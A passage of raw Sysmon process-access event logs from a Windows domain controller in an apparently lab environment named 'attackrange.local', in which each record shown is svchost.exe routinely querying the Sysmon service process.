84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4813,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4814,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4815,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4816,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4817,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4818,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4819,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4820,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 